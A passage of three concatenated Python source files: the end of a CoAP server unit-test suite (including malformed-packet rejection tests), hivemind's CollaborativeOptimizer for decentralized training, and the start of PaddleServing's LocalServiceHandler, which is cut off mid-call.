defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = "test" exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.PUT.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "testPUT" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CHANGED.number expected.token = None expected.payload = None exchange3 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.DELETE.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.DELETED.number expected.token = None expected.payload = None exchange4 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1, exchange2, exchange3, exchange4]) def test_not_found(self): print("TEST_not_found") path = "/Server1/not_found" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.token = 100 expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.NOT_FOUND.number expected.token = 100 expected.payload = None exchange1 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "testPOST" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.METHOD_NOT_ALLOWED.number expected.token = None exchange2 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.PUT.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "testPUT" expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.NOT_FOUND.number expected.token = None expected.payload = None exchange3 = (req, expected) self.current_mid += 1 req = Request() req.code = defines.Codes.DELETE.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.NOT_FOUND.number expected.token = None expected.payload = None exchange4 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1, exchange2, exchange3, exchange4]) def test_invalid(self): print("TEST_INVALID") # version req = (b'\x00\x01\x8c\xda', self.server_address) expected = Response() expected.type = defines.Types["RST"] expected._mid = None expected.code = defines.Codes.BAD_REQUEST.number exchange1 = (req, expected) # version req = (b'\x40', self.server_address) expected = Response() expected.type = defines.Types["RST"] expected._mid = None expected.code = defines.Codes.BAD_REQUEST.number exchange2 = (req, expected) # code req = (b'\x40\x05\x8c\xda', self.server_address) expected = Response() expected.type = defines.Types["RST"] expected._mid = None expected.code = defines.Codes.BAD_REQUEST.number exchange3 = (req, expected) # get/option req = (b'\x40\x01\x8c\xda\x94', self.server_address) expected = Response() expected.type = defines.Types["RST"] expected._mid = None expected.code = defines.Codes.BAD_REQUEST.number exchange4 = (req, expected) # post/payload marker req = (b'\x40\x02\x8c\xda\x75\x62\x61\x73\x69\x63\xff', self.server_address) expected = Response() expected.type = defines.Types["RST"] expected._mid = None expected.code = defines.Codes.BAD_REQUEST.number exchange5 = (req, expected) self._test_datagram([exchange1, exchange2, exchange3, exchange4, exchange5]) def test_post_block_big_client(self): print("TEST_POST_BLOCK_BIG_CLIENT") path = "/Server1/big" req = Request() req.code = defines.Codes.POST.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.payload = "Lorem ipsum dolor sit amet, consectetur adipiscing elit. Cras sollicitudin fermentum ornare. " \ "Cras accumsan tellus quis dui lacinia eleifend. Proin ultrices rutrum orci vitae luctus. " \ "Nullam malesuada pretium elit, at aliquam odio vehicula in. Etiam nec maximus elit. " \ "Etiam at erat ac ex ornare feugiat. Curabitur sed malesuada orci, id aliquet nunc. Phasellus " \ "nec leo luctus, blandit lorem sit amet, interdum metus. Duis efficitur volutpat magna, ac " \ "ultricies nibh aliquet sit amet. Etiam tempor egestas augue in hendrerit. Nunc eget augue " \ "ultricies, dignissim lacus et, vulputate dolor. Nulla eros odio, fringilla vel massa ut, " \ "facilisis cursus quam. Fusce faucibus lobortis congue. Fusce consectetur porta neque, id " \ "sollicitudin velit maximus eu. Sed pharetra leo quam, vel finibus turpis cursus ac. " \ "Aenean ac nisi massa. Cras commodo arcu nec ante tristique ullamcorper. Quisque eu hendrerit" \ " urna. Cras fringilla eros ut nunc maximus, non porta nisl mollis. Aliquam in rutrum massa." \ " Praesent tristique turpis dui, at ultricies lorem fermentum at. Vivamus sit amet ornare neque, " \ "a imperdiet nisl. Quisque a iaculis libero, id tempus lacus. Aenean convallis est non justo " \ "consectetur, a hendrerit enim consequat. In accumsan ante a egestas luctus. Etiam quis neque " \ "nec eros vestibulum faucibus. Nunc viverra ipsum lectus, vel scelerisque dui dictum a. Ut orci " \ "enim, ultrices a ultrices nec, pharetra in quam. Donec accumsan sit amet eros eget fermentum." \ "Vivamus ut odio ac odio malesuada accumsan. Aenean vehicula diam at tempus ornare. Phasellus " \ "dictum mauris a mi consequat, vitae mattis nulla fringilla. Ut laoreet tellus in nisl efficitur," \ " a luctus justo tempus. Fusce finibus libero eget velit finibus iaculis. Morbi rhoncus purus " \ "vel vestibulum ullamcorper. Sed ac metus in urna fermentum feugiat. Nulla nunc diam, sodales " \ "aliquam mi id, varius porta nisl. Praesent vel nibh ac turpis rutrum laoreet at non odio. " \ "Phasellus ut posuere mi. Suspendisse malesuada velit nec mauris convallis porta. Vivamus " \ "sed ultrices sapien, at cras amet." expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CHANGED.number expected.token = None expected.payload = None exchange1 = (req, expected) self.current_mid += 1 self._test_with_client([exchange1]) def test_observe_client(self): print("TEST_OBSERVE_CLIENT") path = "/Server1/basic" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address req.observe = 0 expected = Response() expected.type = defines.Types["ACK"] expected._mid = None expected.code = defines.Codes.CONTENT.number expected.token = None expected.payload = None exchange1 = (req, expected) self._test_with_client_observe([exchange1]) def test_duplicate(self): print("TEST_DUPLICATE") path = "/Server1/basic" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = defines.Codes.CONTENT.number expected.token = None self.current_mid += 1 self._test_plugtest([(req, expected), (req, expected)]) def test_duplicate_not_completed(self): print("TEST_DUPLICATE_NOT_COMPLETED") path = "/Server1/long" req = Request() req.code = defines.Codes.GET.number req.uri_path = path req.type = defines.Types["CON"] req._mid = self.current_mid req.destination = self.server_address expected = Response() expected.type = defines.Types["ACK"] expected._mid = self.current_mid expected.code = None expected.token = None expected2 = Response() expected2.type = defines.Types["CON"] expected2._mid = None expected2.code = defines.Codes.CONTENT.number expected2.token = None self.current_mid += 1 self._test_plugtest([(req, None), (req, expected), (None, expected2)]) if __name__ == '__main__': unittest.main()
collaborative.py
from __future__ import annotations import logging from dataclasses import dataclass from threading import Thread, Lock, Event from typing import Dict, Optional, Iterator import numpy as np import torch from pydantic import BaseModel, StrictBool, StrictFloat, confloat, conint from hivemind.client.averaging.training import TrainingAverager from hivemind.dht import DHT from hivemind.dht.crypto import RSASignatureValidator from hivemind.dht.schema import BytesWithPublicKey, SchemaValidator from hivemind.optim.base import DecentralizedOptimizerBase from hivemind.optim.performance_ema import PerformanceEMA from hivemind.utils import Endpoint, ValueWithExpiration, get_dht_time, get_logger logger = get_logger(__name__) LRSchedulerBase = getattr(torch.optim.lr_scheduler, '_LRScheduler', None) @dataclass(frozen=False) class CollaborationState: optimizer_step: int samples_accumulated: int target_batch_size: int num_peers: int num_clients: int eta_next_step: float next_fetch_time: float @property def ready_for_step(self): return self.samples_accumulated >= self.target_batch_size or get_dht_time() >= self.eta_next_step def register_step(self, local_step: int): self.optimizer_step = max(local_step, self.optimizer_step) self.samples_accumulated = 0 self.eta_next_step = float('inf') class TrainingState(BaseModel): endpoint: Endpoint step: conint(ge=0, strict=True) samples_accumulated: conint(ge=0, strict=True) samples_per_second: confloat(ge=0.0, strict=True) time: StrictFloat client_mode: StrictBool class TrainingProgressSchema(BaseModel): progress: Dict[BytesWithPublicKey, Optional[TrainingState]] class CollaborativeOptimizer(DecentralizedOptimizerBase): """ An optimizer that performs model updates after collaboratively accumulating a target (large) batch size across peers These optimizers use DHT to track how much progress did the collaboration make towards target batch size. Once enough samples were accumulated, optimizers will compute a weighted average of their statistics. :note: This optimizer behaves unlike regular pytorch optimizers in two ways: - calling .step will periodically zero-out gradients w.r.t. model parameters after each step - it may take multiple .step calls without updating model parameters, waiting for peers to accumulate enough samples :param opt: a standard pytorch optimizer, preferably a large-batch one such as LAMB, LARS, etc. :param dht: a running hivemind.DHT daemon connected to other peers :param prefix: a common prefix for all metadata stored by CollaborativeOptimizer in the DHT :param target_batch_size: perform optimizer step after all peers collectively accumulate this many samples :param batch_size_per_step: before each call to .step, user should accumulate gradients over this many samples :param min_refresh_period: wait for at least this many seconds before fetching new collaboration state :param max_refresh_period: wait for at most this many seconds before fetching new collaboration state :param default_refresh_period: if no peers are detected, attempt to fetch collaboration state this often (seconds) :param expected_drift_peers: assume that this many new peers can join between steps :param expected_drift_rate: assumes that this fraction of current collaboration can join/leave between steps :note: the expected collaboration drift parameters are used to adjust the frequency with which this optimizer will refresh the collaboration-wide statistics (to avoid missing the moment when to run the next step) :param bandwidth: peer's network bandwidth for the purpose of load balancing (recommended: internet speed in mbps) :param step_tolerance: a peer can temporarily be delayed by this many steps without being deemed out of sync :param performance_ema_alpha: smoothing value used to estimate this peer's performance (training samples per second) :param averaging_expiration: peer's requests for averaging will be valid for this many seconds :param metadata_expiration: peer's metadata (e.g. samples processed) is stored onto DHT for this many seconds :param averaging_timeout: if an averaging step hangs for this long, it will be cancelled. :param scheduler: if specified, use this scheduler to update optimizer learning rate :param reuse_grad_buffers: if True, use model's .grad buffers for gradient accumulation. This is more memory efficient, but it requires that the user does *NOT* call model/opt zero_grad at all :param accumulate_grads_on: if specified, accumulate gradients on this device. By default, this will use the same device as model parameters. One can specify a different device (e.g. 'cpu' vs 'cuda') to save device memory at the cost of extra time per step. If reuse_gradient_accumulators is True, this parameter has no effect. :param client_mode: if True, runs training without incoming connections, in a firewall-compatible mode :param kwargs: additional parameters forwarded to DecentralizedAverager :note: if you are using CollaborativeOptimizer with a lr_scheduler, it is recommended to pass this scheduler explicitly into this class. Otherwise, scheduler may not be synchronized between peers. """ def __init__(self, opt: torch.optim.Optimizer, *, dht: DHT, prefix: str, target_batch_size: int, batch_size_per_step: Optional[int] = None, scheduler: Optional[LRSchedulerBase] = None, min_refresh_period: float = 0.5, max_refresh_period: float = 30, default_refresh_period: float = 3, expected_drift_peers: float = 3, expected_drift_rate: float = 0.2, performance_ema_alpha: float = 0.1, metadata_expiration: float = 60.0, averaging_timeout: Optional[float] = None, step_tolerance: int = 1, reuse_grad_buffers: bool = False, accumulate_grads_on: Optional[torch.device] = None, client_mode: bool = False, verbose: bool = False, **kwargs): super().__init__(opt, dht) signature_validator = RSASignatureValidator() self._local_public_key = signature_validator.local_public_key dht.add_validators([SchemaValidator(TrainingProgressSchema, prefix=prefix), signature_validator]) if reuse_grad_buffers and accumulate_grads_on is not None: logger.warning("Setting 'accumulate_grads_on' has no effect if reuse_grad_buffers=True") self.prefix, self.scheduler = prefix, scheduler self.target_batch_size, self.batch_size_per_step = target_batch_size, batch_size_per_step self.min_refresh_period, self.max_refresh_period, self.default_refresh_period =\ min_refresh_period, max_refresh_period, default_refresh_period self.expected_drift_peers, self.expected_drift_rate = expected_drift_peers, expected_drift_rate self.averaging_timeout, self.metadata_expiration = averaging_timeout, metadata_expiration self._grads, self.reuse_grad_buffers, self.accumulate_grads_on = None, reuse_grad_buffers, accumulate_grads_on self.client_mode, self.step_tolerance = client_mode, step_tolerance self.status_loglevel = logging.INFO if verbose else logging.DEBUG self.averager = self._make_averager(**kwargs) self.training_progress_key = f"{self.prefix}_progress" self.local_samples_accumulated = 0 # a number of local samples accumulated since last optimizer update self.local_steps_accumulated = 0 # a number of calls to step() since last optimizer update self.performance_ema = PerformanceEMA(alpha=performance_ema_alpha) self.last_step_time = None self.collaboration_state = self.fetch_collaboration_state() self.lock_collaboration_state, self.collaboration_state_updated = Lock(), Event() self.lock_local_progress, self.should_report_progress = Lock(), Event() self.progress_reporter = Thread(target=self.report_training_progress, daemon=True, name=f"{self}.reporter") self.progress_reporter.start() self.collaboration_state_updater = Thread(target=self.check_collaboration_state_periodically, daemon=True, name=f"{self}.collaboration_state_updater") self.collaboration_state_updater.start() def _make_averager(self, **kwargs): return TrainingAverager(self.opt, dht=self.dht, average_parameters=True, average_gradients=True, prefix=f"{self.prefix}_averaging", allreduce_timeout=self.averaging_timeout, listen=not self.client_mode, **kwargs) @property def local_step(self) -> int: return self.averager.local_step @property def is_synchronized(self) -> bool: return self.local_step >= self.collaboration_state.optimizer_step - self.step_tolerance def is_alive(self) -> bool: return self.averager.is_alive() def load_state_from_peers(self, **kwargs): """ Attempt to fetch the newest collaboration state from other peers """ with self.lock_collaboration_state: self.averager.load_state_from_peers(**kwargs) self.local_samples_accumulated = self.local_steps_accumulated = 0 self.reset_accumulated_grads_() self.update_scheduler() def step(self, batch_size: Optional[int] = None, **kwargs): """ Report accumulating gradients w.r.t. batch_size additional samples, optionally update model parameters :param batch_size: optional override for batch_size_per_step from init :note: this .step is different from normal pytorch optimizers in several key ways. See __init__ for details. """ if self.batch_size_per_step is None: if batch_size is None: raise ValueError("Please either set batch_size_per_step parameter at init or when calling .step") logger.log(self.status_loglevel, f"Setting default batch_size_per_step to {batch_size}") self.batch_size_per_step = batch_size batch_size = batch_size if batch_size is not None else self.batch_size_per_step if not self.is_synchronized: logger.log(self.status_loglevel, "Peer is out of sync.") self.load_state_from_peers() return if self.last_step_time is not None and get_dht_time() - self.last_step_time > self.metadata_expiration: logger.warning(f"Training step took {get_dht_time() - self.last_step_time}, " f"but metadata expired in {self.metadata_expiration} s.") self.accumulate_grads_(batch_size) with self.lock_local_progress: self.local_samples_accumulated += batch_size self.local_steps_accumulated += 1 self.performance_ema.update(num_processed=batch_size) self.should_report_progress.set() if not self.collaboration_state.ready_for_step: return logger.log(self.status_loglevel, f"Beginning global optimizer step {self.collaboration_state.optimizer_step}") self.collaboration_state = self.fetch_collaboration_state() self.collaboration_state_updated.set() if not self.is_synchronized: self.load_state_from_peers() return with self.performance_ema.pause(), self.lock_collaboration_state: # divide accumulators by local steps to recover the true average grad w.r.t. local_samples_accumulated self.apply_accumulated_grads_(scale_by=1. / self.local_steps_accumulated) current_step, group_info = self.averager.local_step, None if self.collaboration_state.num_peers > 1: mean_samples_per_worker = self.target_batch_size / self.collaboration_state.num_peers weight = self.local_samples_accumulated / mean_samples_per_worker try: group_info = self.averager.step(weight=weight, timeout=self.averaging_timeout, **kwargs) if group_info: logger.log(self.status_loglevel, f"Averaged tensors successfully with {len(group_info)} peers") except BaseException as e: logger.log(self.status_loglevel, f"Skipped averaging: averaging round failed with {repr(e)}.") else: logger.log(self.status_loglevel, f"Skipped averaging: collaboration consists of " f"{self.collaboration_state.num_peers} peer(s).") self.opt.step() self.reset_accumulated_grads_() self.local_samples_accumulated = self.local_steps_accumulated = 0 self.collaboration_state.register_step(current_step + 1) self.averager.local_step = current_step + 1 self.collaboration_state_updated.set() self.update_scheduler() logger.log(self.status_loglevel, f"Optimizer step: done!") return group_info def step_aux(self, **kwargs): """ Find and assist other peers in averaging without sending local gradients. :note: this .step is different from normal pytorch optimizers in several key ways. See __init__ for details. """ if not self.collaboration_state.ready_for_step: return logger.log(self.status_loglevel, f"Beginning global optimizer step {self.collaboration_state.optimizer_step}") self.collaboration_state = self.fetch_collaboration_state() self.collaboration_state_updated.set() with self.lock_collaboration_state: # divide accumulators by local steps to recover the true average grad w.r.t. local_samples_accumulated current_step, group_info = self.averager.local_step, None try: group_info = self.averager.step(timeout=self.averaging_timeout, **kwargs) if group_info: logger.log(self.status_loglevel, f"Averaged tensors successfully with {len(group_info)} peers") except BaseException as e: logger.log(self.status_loglevel, f"Skipped averaging: averaging round failed with {repr(e)}.") self.collaboration_state.register_step(current_step + 1) self.averager.local_step = current_step + 1 self.collaboration_state_updated.set() logger.log(self.status_loglevel, f"Optimizer step: done!") return group_info def _grad_buffers(self) -> Iterator[torch.Tensor]: """ pytorch-internal gradient buffers """ for param_group in self.opt.param_groups: for param in param_group['params']: if param.grad is None: yield torch.zeros_like(param) else: yield param.grad @torch.no_grad() def accumulated_grads(self) -> Iterator[torch.Tensor]: """ local gradient accumulators """ if self.reuse_grad_buffers: yield from self._grad_buffers() elif self._grads is None: with torch.no_grad(): self._grads = [torch.zeros_like(grad, device=self.accumulate_grads_on) for grad in self._grad_buffers()] yield from self._grads @torch.no_grad() def accumulate_grads_(self, batch_size: int): """ add current gradients to grad accumulators (if any) """ if self.reuse_grad_buffers: return # user is responsible for accumulating gradients in .grad buffers alpha = float(batch_size) / self.batch_size_per_step for grad_buf, grad_acc in zip(self._grad_buffers(), self.accumulated_grads()): grad_acc.add_(grad_buf.to(grad_acc.device), alpha=alpha) @torch.no_grad() def apply_accumulated_grads_(self, scale_by: Optional[float] = None): if self.reuse_grad_buffers: return for grad_buf, grad_acc in zip(self._grad_buffers(), self.accumulated_grads()): grad_buf[...] = grad_acc.to(grad_buf.device) if scale_by is not None: grad_buf.mul_(scale_by) @torch.no_grad() def reset_accumulated_grads_(self): if self.reuse_grad_buffers: self.opt.zero_grad() else: for grad_buf in self.accumulated_grads(): grad_buf.zero_() def report_training_progress(self): """ Periodically publish metadata and the current number of samples accumulated towards the next step """ while self.is_alive(): self.should_report_progress.wait() self.should_report_progress.clear() with self.lock_local_progress: current_time = get_dht_time() local_state_info = TrainingState( endpoint=self.averager.endpoint, step=self.local_step, samples_accumulated=self.local_samples_accumulated, samples_per_second=self.performance_ema.samples_per_second, time=current_time, client_mode=not self.averager.listen) self.dht.store(key=self.training_progress_key, subkey=self._local_public_key, value=local_state_info.dict(), expiration_time=current_time + self.metadata_expiration, return_future=True) def check_collaboration_state_periodically(self): """ Periodically check the training progress from all peers. Trigger update after target_batch_size total samples """ while self.is_alive(): time_to_next_update = max(0.0, self.collaboration_state.next_fetch_time - get_dht_time()) if self.collaboration_state_updated.wait(time_to_next_update): self.collaboration_state_updated.clear() continue # if state was updated externally, reset timer with self.lock_collaboration_state: self.collaboration_state = self.fetch_collaboration_state() def fetch_collaboration_state(self) -> CollaborationState: """ Read performance statistics reported by peers, estimate progress towards next batch """ response, _expiration = self.dht.get(self.training_progress_key, latest=True) or (None, -float('inf')) current_time = get_dht_time() if not isinstance(response, dict) or len(response) == 0: logger.log(self.status_loglevel, f"Found no active peers: {response}") local_eta_next_step = max(0, self.target_batch_size - self.local_steps_accumulated ) / self.performance_ema.samples_per_second return CollaborationState(self.local_step, self.local_samples_accumulated, self.target_batch_size, num_peers=0, num_clients=0, eta_next_step=current_time + local_eta_next_step, next_fetch_time=current_time + self.default_refresh_period) valid_peer_states = [TrainingState.parse_obj(peer_state.value) for peer_state in response.values() if peer_state.value is not None] num_peers = len(valid_peer_states) num_clients = sum(state.client_mode for state in valid_peer_states) global_optimizer_step = self.local_step for state in valid_peer_states: if not state.client_mode: global_optimizer_step = max(global_optimizer_step, state.step) total_samples_accumulated = estimated_current_samples = total_samples_per_second = 0 for state in valid_peer_states: total_samples_per_second += state.samples_per_second if state.step == global_optimizer_step: total_samples_accumulated += state.samples_accumulated estimated_current_samples += (state.samples_accumulated + max(0, current_time - state.time) * state.samples_per_second) # note: we deliberately count only valid peers for samples_accumulated, but all peers for performance; # the rationale behind this is that outdated peers will synchronize and begin contributing shortly. estimated_samples_remaining = self.target_batch_size - estimated_current_samples estimated_time_to_next_step = max(0, estimated_samples_remaining) / total_samples_per_second expected_max_peers = max(num_peers + self.expected_drift_peers, num_peers * (1 + self.expected_drift_rate)) time_to_next_fetch = float(np.clip(a=estimated_time_to_next_step * num_peers / expected_max_peers, a_min=self.min_refresh_period, a_max=self.max_refresh_period)) logger.log(self.status_loglevel, f"Collaboration accumulated {total_samples_accumulated} samples from " f"{num_peers} peers; ETA {estimated_time_to_next_step:.2f} seconds " f"(refresh in {time_to_next_fetch:.2f}s.)") return CollaborationState( global_optimizer_step, total_samples_accumulated, target_batch_size=self.target_batch_size, num_peers=num_peers, num_clients=num_clients, eta_next_step=current_time + estimated_time_to_next_step, next_fetch_time=current_time + time_to_next_fetch) def zero_grad(self, *args, **kwargs): if self.reuse_grad_buffers: raise ValueError(f"When running {self.__class__.__name__} with reuse_grad_buffers=True, user should never " f"call zero_grad manually. Gradients will be refreshed internally.") return self.opt.zero_grad(*args, **kwargs) def update_scheduler(self): if self.scheduler: while self.scheduler._step_count < self.local_step: self.scheduler.step() def shutdown(self): logger.debug("Shutting down averager...") self.averager.shutdown() logger.debug("Sending goodbye to peers...") self.dht.store(self.training_progress_key, subkey=self._local_public_key, value=None, expiration_time=get_dht_time() + self.metadata_expiration) logger.debug(f"{self.__class__.__name__} is shut down.") def __del__(self): self.shutdown()
local_service_handler.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import logging import multiprocessing from .error_catch import ErrorCatch, CustomException, CustomExceptionCode #from paddle_serving_server import OpMaker, OpSeqMaker #from paddle_serving_server import Server as GpuServer #from paddle_serving_server import Server as CpuServer from . import util #from paddle_serving_app.local_predict import LocalPredictor _LOGGER = logging.getLogger(__name__) _workdir_name_gen = util.NameGenerator("workdir_") class LocalServiceHandler(object): """ LocalServiceHandler is the processor of the local service, contains three client types, brpc, grpc and local_predictor.If you use the brpc or grpc, serveing startup ability is provided.If you use local_predictor, local predict ability is provided by paddle_serving_app. """ def __init__(self, model_config, client_type='local_predictor', workdir="", thread_num=2, device_type=-1, devices="", fetch_names=None, mem_optim=True, ir_optim=False, available_port_generator=None, use_profile=False, precision="fp32", use_mkldnn=False, mkldnn_cache_capacity=0, mkldnn_op_list=None, mkldnn_bf16_op_list=None, min_subgraph_size=3, dynamic_shape_info={}, use_calib=False): """ Initialization of localservicehandler Args: model_config: model config path client_type: brpc, grpc and local_predictor[default] workdir: work directory thread_num: number of threads, concurrent quantity. device_type: support multiple devices. -1=Not set, determined by `devices`. 0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu devices: gpu id list[gpu], "" default[cpu] fetch_names: get fetch names out of LocalServiceHandler in local_predictor mode. fetch_names_ is compatible for Client(). mem_optim: use memory/graphics memory optimization, True default. ir_optim: use calculation chart optimization, False default. available_port_generator: generate available ports use_profile: use profiling, False default. precision: inference precesion, e.g. "fp32", "fp16", "int8" use_mkldnn: use mkldnn, default False. mkldnn_cache_capacity: cache capacity of mkldnn, 0 means no limit. mkldnn_op_list: OP list optimized by mkldnn, None default. mkldnn_bf16_op_list: OP list optimized by mkldnn bf16, None default. use_calib: set inference use_calib_mode param, False default. Returns: None """ if available_port_generator is None: available_port_generator = util.GetAvailablePortGenerator() self._model_config = model_config self._port_list = [] self._device_name = "cpu" self._use_gpu = False self._use_trt = False self._use_lite = False self._use_xpu = False self._use_ascend_cl = False self._use_mkldnn = False self._mkldnn_cache_capacity = 0 self._mkldnn_op_list = None self._mkldnn_bf16_op_list = None self.min_subgraph_size = 3 self.dynamic_shape_info = {} self._use_calib = False if device_type == -1: # device_type is not set, determined by `devices`, if devices == "": # CPU self._device_name = "cpu" devices = [-1] else: # GPU self._device_name = "gpu" self._use_gpu = True devices = [int(x) for x in devices.split(",")] elif device_type == 0: # CPU self._device_name = "cpu" devices = [-1] elif device_type == 1: # GPU self._device_name = "gpu" self._use_gpu = True devices = [int(x) for x in devices.split(",")] elif device_type == 2: # Nvidia Tensor RT self._device_name = "gpu" self._use_gpu = True devices = [int(x) for x in devices.split(",")] self._use_trt = True self.min_subgraph_size = min_subgraph_size self.dynamic_shape_info = dynamic_shape_info elif device_type == 3: # ARM CPU self._device_name = "arm" devices = [-1] self._use_lite = True elif device_type == 4: # Kunlun XPU self._device_name = "arm" devices = [int(x) for x in devices.split(",")] self._use_lite = True self._use_xpu = True elif device_type == 5: # Ascend 310 ARM CPU self._device_name = "arm" devices = [int(x) for x in devices.split(",")] self._use_lite = True self._use_ascend_cl = True elif device_type == 6: # Ascend 910 ARM CPU self._device_name = "arm" devices = [int(x) for x in devices.split(",")] self._use_ascend_cl = True else: _LOGGER.error( "LocalServiceHandler initialization fail. device_type={}" .format(device_type)) if client_type == "brpc" or client_type == "grpc": for _ in devices: self._port_list.append(available_port_generator.next()) _LOGGER.info("Create ports for devices:{}. Port:{}" .format(devices, self._port_list)) self._client_type = client_type self._workdir = workdir self._devices = devices self._thread_num = thread_num self._mem_optim = mem_optim self._ir_optim = ir_optim self._local_predictor_client = None self._rpc_service_list = [] self._server_pros = [] self._use_profile = use_profile self._fetch_names = fetch_names self._precision = precision self._use_mkldnn = use_mkldnn self._mkldnn_cache_capacity = mkldnn_cache_capacity self._mkldnn_op_list = mkldnn_op_list self._mkldnn_bf16_op_list = mkldnn_bf16_op_list self._use_calib = use_calib _LOGGER.info( "Models({}) will be launched by device {}. use_gpu:{}, " "use_trt:{}, use_lite:{}, use_xpu:{}, device_type:{}, devices:{}, " "mem_optim:{}, ir_optim:{}, use_profile:{}, thread_num:{}, " "client_type:{}, fetch_names:{}, precision:{}, use_calib:{}, " "use_mkldnn:{}, mkldnn_cache_capacity:{}, mkldnn_op_list:{}, " "mkldnn_bf16_op_list:{}, use_ascend_cl:{}, min_subgraph_size:{}," "is_set_dynamic_shape_info:{}".format( model_config, self._device_name, self._use_gpu, self._use_trt, self._use_lite, self._use_xpu, device_type, self._devices, self._mem_optim, self._ir_optim, self._use_profile, self._thread_num, self._client_type, self._fetch_names, self._precision, self._use_calib, self._use_mkldnn, self._mkldnn_cache_capacity, self._mkldnn_op_list, self._mkldnn_bf16_op_list, self._use_ascend_cl, self.min_subgraph_size, bool(len(self.dynamic_shape_info)))) def get_fetch_list(self): return self._fetch_names def get_port_list(self): return self._port_list def get_client(self, concurrency_idx): """ Function get_client is only used for local predictor case, creates one LocalPredictor object, and initializes the paddle predictor by function load_model_config.The concurrency_idx is used to select running devices. Args: concurrency_idx: process/thread index Returns: _local_predictor_client """ #checking the legality of concurrency_idx. device_num = len(self._devices) if device_num <= 0: _LOGGER.error("device_num must be not greater than 0. devices({})". format(self._devices)) raise ValueError("The number of self._devices error") if concurrency_idx < 0: _LOGGER.error("concurrency_idx({}) must be one positive number". format(concurrency_idx)) concurrency_idx = 0 elif concurrency_idx >= device_num: concurrency_idx = concurrency_idx % device_num _LOGGER.info("GET_CLIENT : concurrency_idx={}, device_num={}".format( concurrency_idx, device_num)) from paddle_serving_app.local_predict import LocalPredictor if self._local_predictor_client is None: self._local_predictor_client = LocalPredictor() # load model config and init predictor self._local_predictor_client.load_model_config( model_path=self._model_config, use_gpu=self._use_gpu, gpu_id=self._devices[concurrency_idx], use_profile=self._use_profile, thread_num=self._thread_num, mem_optim=self._mem_optim, ir_optim=self._ir_optim, use_trt=self._use_trt, use_lite=self._use_lite, use_xpu=self._use_xpu, precision=self._precision, use_mkldnn=self._use_mkldnn, mkldnn_cache_capacity=self._mkldnn_cache_capacity, mkldnn_op_list=self._mkldnn_op_list, mkldnn_bf16_op_list=self._mkldnn_bf16_op_list, use_ascend_cl=self._use_ascend_cl, min_subgraph_size=self.min_subgraph_size, dynamic_shape_info=self.dynamic_shape_info, use_calib=self._use_calib) return self._local_predictor_client def get_client_config(self): return os.path.join(self._model_config, "serving_server_conf.prototxt") def _prepare_one_server(self, workdir, port, gpuid, thread_num, mem_optim, ir_optim, precision): """ According to self._device_name, generating one Cpu/Gpu/Arm Server, and setting the model config amd startup params. Args: workdir: work directory port: network port gpuid: gpu id thread_num: thread num mem_optim: use memory/graphics memory optimization ir_optim: use calculation chart optimization precision: inference precison, e.g."fp32", "fp16", "int8" Returns: server: CpuServer/GpuServer """ if self._device_name == "cpu": from paddle_serving_server import OpMaker, OpSeqMaker, Server op_maker = OpMaker() read_op = op_maker.create('general_reader') general_infer_op = op_maker.create('general_infer') general_response_op = op_maker.create('general_response') op_seq_maker = OpSeqMaker() op_seq_maker.add_op(read_op) op_seq_maker.add_op(general_infer_op) op_seq_maker.add_op(general_response_op) server = Server() else: #gpu or arm from paddle_serving_server import OpMaker, OpSeqMaker, Server op_maker = OpMaker() read_op = op_maker.create('general_reader') general_infer_op = op_maker.create('general_infer') general_response_op = op_maker.create('general_response') op_seq_maker = OpSeqMaker() op_seq_maker.add_op(read_op) op_seq_maker.add_op(general_infer_op) op_seq_maker.add_op(general_response_op) server = Server() if gpuid >= 0: server.set_gpuid(gpuid) # TODO: support arm or arm + xpu later server.set_device(self._device_name) if self._use_xpu: server.set_xpu() if self._use_lite: server.set_lite() if self._use_ascend_cl: server.set_ascend_cl() server.set_op_sequence(op_seq_maker.get_op_sequence()) server.set_num_threads(thread_num) server.set_memory_optimize(mem_optim) server.set_ir_optimize(ir_optim) server.set_precision(precision) server.load_model_config(self._model_config) server.prepare_server( 